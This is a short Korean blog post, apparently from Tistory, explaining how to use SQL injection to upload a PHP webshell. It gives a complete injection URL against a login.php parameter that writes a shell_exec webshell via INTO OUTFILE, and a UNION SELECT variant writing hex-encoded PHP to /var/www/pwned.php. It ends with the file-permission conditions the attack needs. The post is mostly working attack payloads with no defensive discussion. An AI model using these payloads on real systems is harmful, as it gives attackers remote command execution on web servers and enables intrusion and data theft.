티스토리 뷰

http 에러 메시지를 통해 절대경로를 취득 후 webshell upload
http://test.com/login/login.php?user_id=admin';select '<?echo shell_exec($_GET["cmd"]);?>' INTO OUTFILE 'C:/APM_Setup/htdocs/abc.php';#user_pw=1234!@#$



webshell 실행 화면


UNION 구문을 이용한 방법
select ... where id=30 and 1=0 union select 0x[PHP source hex encoded] into outfile ('/var/www/pwned.php')

※ 공격 성공을 위한 조건
mysql's user has rights of writing files.
linux's user "mysql" has right +w on /var/www folder.

댓글
안내
궁금한 점을 댓글로 남겨주시면 답변해 드립니다.